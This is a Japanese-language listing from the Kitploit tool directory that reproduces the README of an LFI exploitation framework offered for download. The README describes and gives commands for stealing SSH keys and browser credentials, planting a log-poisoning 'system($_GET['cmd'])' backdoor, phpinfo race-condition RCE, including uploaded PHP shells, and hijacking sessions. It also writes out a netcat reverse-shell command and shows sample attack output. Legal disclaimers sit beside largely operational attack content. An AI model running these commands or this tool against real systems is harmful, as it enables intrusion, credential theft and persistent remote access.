Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
LFI-Destruction — このプログラムは、Local File Inclusion(LFI)情報を入力するよう促し、自動的に /etc/passwd を検索し、見つかったユーザー名を使用してSSHキーまたはそのバリエーションを検索し、ローカルコンピュータにダウンロードします。また、このプログラムはCVE-2021-41773(Apache 2.4.49および2.4.50のパストラバーサルエクスプロイト)も実行します。その他のLFI脆弱性にも対応しています。 | Kitploit
ツール/GitHubGitHub/revshellxd/lfi-destruction
特権昇格偵察パスワード攻撃ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集CTFペネトレーションテスト学習と教育
GitHub
46ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
revshellxd/lfi-destruction

LFI-Destruction

このプログラムは、Local File Inclusion(LFI)情報を入力するよう促し、自動的に /etc/passwd を検索し、見つかったユーザー名を使用してSSHキーまたはそのバリエーションを検索し、ローカルコンピュータにダウンロードします。また、このプログラムはCVE-2021-41773(Apache 2.4.49および2.4.50のパストラバーサルエクスプロイト)も実行します。その他のLFI脆弱性にも対応しています。

リポジトリを見る

🔥 LFI-Destruction – 認可されたペネトレーションテストフレームワーク

LFI-Destroyerは、認可されたセキュリティ専門家向けに設計された、包括的でモジュール式のLocal File Inclusion(LFI)悪用フレームワークです。複数の攻撃手法を1つの使いやすいツールに統合しています:

SSH & ブラウザアーティファクトファジング – LinuxおよびWindows上でSSHキー、Putty PPK、WinSCP、FileZilla、Firefox、Chrome、Edge、Braveの認証情報をハントします。

ログポイズニング → リバースシェル – カスタムペイロード対応の書き込み可能なログファイルを介した自動RCE。

phpinfo() 競合状態RCE – file_uploads=Onかつphpinfo()にアクセス可能な場合の完全自動LFI2RCE。

アップロードファイルトリガー – LFIを介して既にアップロードされたPHPシェルをインクルードして実行。

PHPセッション列挙 – セッションファイルをダウンロードしてデコードし、乗っ取る。

LFI-OSCP.py

OSCP試験対応の安全なバージョンで、自動エクスプロイトは0です。基本的には非常にきれいなファザーであり、エクスプロイトを確認すると、手動でエクスプロイトを実行する方法を表示します。

⚠️ 法的免責事項 このツールは教育目的および認可されたセキュリティテスト専用です。 使用する前に、システム所有者からの明示的な書面による許可が必要です。 無断でのコンピュータシステムへのアクセスは違法かつ非倫理的です。 著者は、このツールの誤用または損害について一切の責任を負いません。

📦 インストール

root@kitploit:~
# 1. リポジトリをクローン
git clone https://github.com/RevShellXD/LFI-Destroyer.git
cd LFI-Destroyer

# 2. 依存関係をインストール(必須はcoloramaのみ。残りはオプション)
pip install colorama

# 3. メインスクリプトを実行可能にする
chmod +x LFI-Destroyer.py

🚀 クイックスタート – モード1(SSH / ブラウザアーティファクトファジング)

root@kitploit:~
python3 LFI-Destroyer.py

LinuxまたはWindowsを選択します。

📂 ディレクトリ構成

root@kitploit:~
LFI-Destruction/
LFI-Destruction.py          

modes/__init__.py ,mode3_phpinfo_race.py, mode4_upload_trigger.py, mode5_session_grabber.py           

artifacts/               

README.md

攻撃モード1を選択します。 プロンプトに従ってLFIエンドポイントを設定します。 スクリプトは自動的にユーザーを列挙し、存在確認(WindowsではNTUSER.DATビーコンを使用)を行い、SSHキー、ブラウザ認証情報、その他の機密ファイルを再帰的にファズします。 すべてのアーティファクトは ./artifacts/ ディレクトリに保存されます。

📝 モード2 – ログポイズニング & リバースシェル

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua

または対話的に実行してモード2を選択します。

動作内容:

  • User-Agent(または選択したベクター)を介してPHPテストペイロードを注入します。
  • 一般的なログファイル(Apache、Nginx、SSH、システムログ、Windows上のXAMPP/WAMP/IIS)をインクルードしようとします。
  • 書き込み可能なログが見つかった場合、永続的な system($_GET['cmd']) バックドアを注入します。
  • id(Linux)または whoami(Windows)でRCEを確認します。
  • リバースシェルリスナーの入力を求め、bash(Linux)またはPowerShell(Windows)のリバースシェルを提供します。

カスタムリバースシェル:

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua --custom-shell "nc {lhost} {lport} -e /bin/bash"

プレースホルダー {lhost} と {lport} はリスナーIP/ポートに置き換えられます。

🧪 BETA – モード3: phpinfo() 競合状態RCE ステータス: Beta – file_uploads=On でphpinfo()にアクセス可能な誤設定のPHPサーバーで確実に動作します。

前提条件:

  • file_uploads = On(自動検出)
  • post_max_size ≥ upload_max_filesize(自動検出)
  • LFIの脆弱性
  • phpinfo()ページへのアクセス(スクリプトは共通の場所をブルートフォース)

実行方法:

root@kitploit:~
python3 LFI-Destroyer.py
# モード3を選択

LFIの詳細を通常通り入力 スクリプトは以下を実行:

  • phpinfo()のブルートフォース(OS固有のワードリスト)
  • upload_max_filesize と post_max_size を解析
  • 競合状態攻撃(アップロード + LFI)を実行
  • RCEを確認
  • リバースシェルを提供

出力例:

root@kitploit:~
[*] Bruteforcing phpinfo.php (45 paths) ...
[+] Found phpinfo.php at http://192.168.1.100/phpinfo.php
[+] file_uploads=On (max size: 8M)
[+] Attempt race condition RCE? (y/N): y
[*] Race attempt 1/3 ...
[+] Extracted temporary file path: /tmp/phpABC123
[+] RCE confirmed via temporary file!
[!] LOG POISONING SUCCESSFUL! Ready to escalate to reverse shell.

🧪 BETA – モード4: アップロードファイルトリガー ステータス: Beta – 既にPHPシェルをアップロードしていることを前提とします(例:別の脆弱性や手動アップロードにより)。スクリプトはLFIを使用してそれをインクルードし、コマンドを実行します。

2つの動作モード:

  • 正確なパス – ファイルの場所がわかっている(例:uploads/shell.php)
  • ブルートフォース – スクリプトに一般的なアップロードディレクトリ+ファイル名を試させる

実行方法:

root@kitploit:~
python3 LFI-Destroyer.py
# モード4を選択

パスまたは 'brute' を入力 スクリプトは以下を実行:

  • ?cmd=whoami でLFIインクルードを試行
  • 成功した場合、出力を表示してリバースシェルを提供

例:

root@kitploit:~
Enter path to uploaded file (relative to web root), or 'brute' to try common locations: uploads/shell.php
[*] Trying uploads/shell.php ...
[+] SUCCESS! Shell executed at uploads/shell.php
[+] Command output:
www-data
Attempt reverse shell? (y/N): y

🧪 BETA – モード5: PHPセッション列挙 & 乗っ取り ステータス: Beta – session.save_path(phpinfo()またはフォールバックワードリストで決定)からセッションファイルを読み取り、保存し、必要に応じてbase64デコードを試みます。

実行方法:

root@kitploit:~
python3 LFI-Destroyer.py
# モード5を選択

セッションIDまたは 'list' を入力して列挙

例:

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: abc123
[*] Reading /var/lib/php/sessions/sess_abc123 ...
[+] Session file retrieved!
[--- SESSION DATA (raw) ---]
username|s:5:"admin";user_id|i:1;

セッションディレクトリのリスト(ディレクトリインデックスが有効な場合):

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: list
[+] Found 12 session files:
  - sess_abc123
  - sess_def456
  ...

すべてのセッションファイルは artifacts/session_* に保存されます。 データがbase64エンコードされているように見える場合、スクリプトは自動的に php://filter/convert.base64-decode バイパスを試み、デコード版を保存します。

🧠 アドバンスモード (-adv) 追加のLFIテクニックを有効にします:

  • POSTパラメータLFI
  • Cookie/Header LFI
  • PHPラッパー(php://filter、data://、expect://)
  • アーティファクトファジング用カスタムワードリスト
  • 自動深度検出
root@kitploit:~
python3 LFI-Destroyer.py -adv

⚙️ コマンドラインフラグ

モード3、4、5は modes/ ディレクトリから動的に読み込まれます。 run(config, fuzzer) 関数を持つPythonファイルを追加することで、簡単に新しいモードを追加できます。

🧰 要件

  • Python 3.8+
  • colorama(オプション、色付き出力用)
  • その他の依存関係はありません – スクリプトは標準ライブラリのみを使用します。

📜 ライセンス & 著者 著者: RevShellXD ライセンス: MIT Licenseの下で提供 – 認可されたセキュリティ専門家は自由に使用できます。

教育目的および認可されたテスト専用です。 このツールを使用して法律を破った場合、その責任はすべてあなたにあります。

⭐ スターを付けて貢献する このツールが役に立つと思われたら、GitHubリポジトリにスターをお願いします。 プルリクエストや新しいモードの貢献を歓迎します – modes/__init__.py のシンプルなモジュールインターフェースに従ってください。

ツールをダウンロード
フラグ説明
--os {linux,windows}対象OSを指定
--auto-depthトラバーサル深度を自動検出
--wordlist FILEファイルパスのカスタムワードリスト(OSデフォルトを上書き)
--userlist FILEWindowsユーザー名のカスタムリスト(モード1)
--beacon-file PATHカスタムビーコンファイル(デフォルト: NTUSER.DAT)
--custom-shell CMDカスタムリバースシェルコマンド({lhost}と{lport}を使用)
--log-poisoningCLIからモード2を有効にする(対話的なモード選択なし)
--log-vector {ua,referer,xff,header,param}ログポイズニングの注入ベクター
--log-header NAMEカスタムヘッダー名(vector=headerの場合)
--log-param NAMEカスタムパラメーター名(vector=paramの場合)
--log-files FILEカスタムログパスリスト
--rce-command CMDRCE確認のテストコマンド
--proxy URLHTTPプロキシ(例:http://127.0.0.1:8080)
--rate FLOATリクエスト間の遅延(秒)
--output FILE結果をJSONに保存
--dry-run設定をテスト – リクエストは送信しない
--no-color色付き出力を無効にする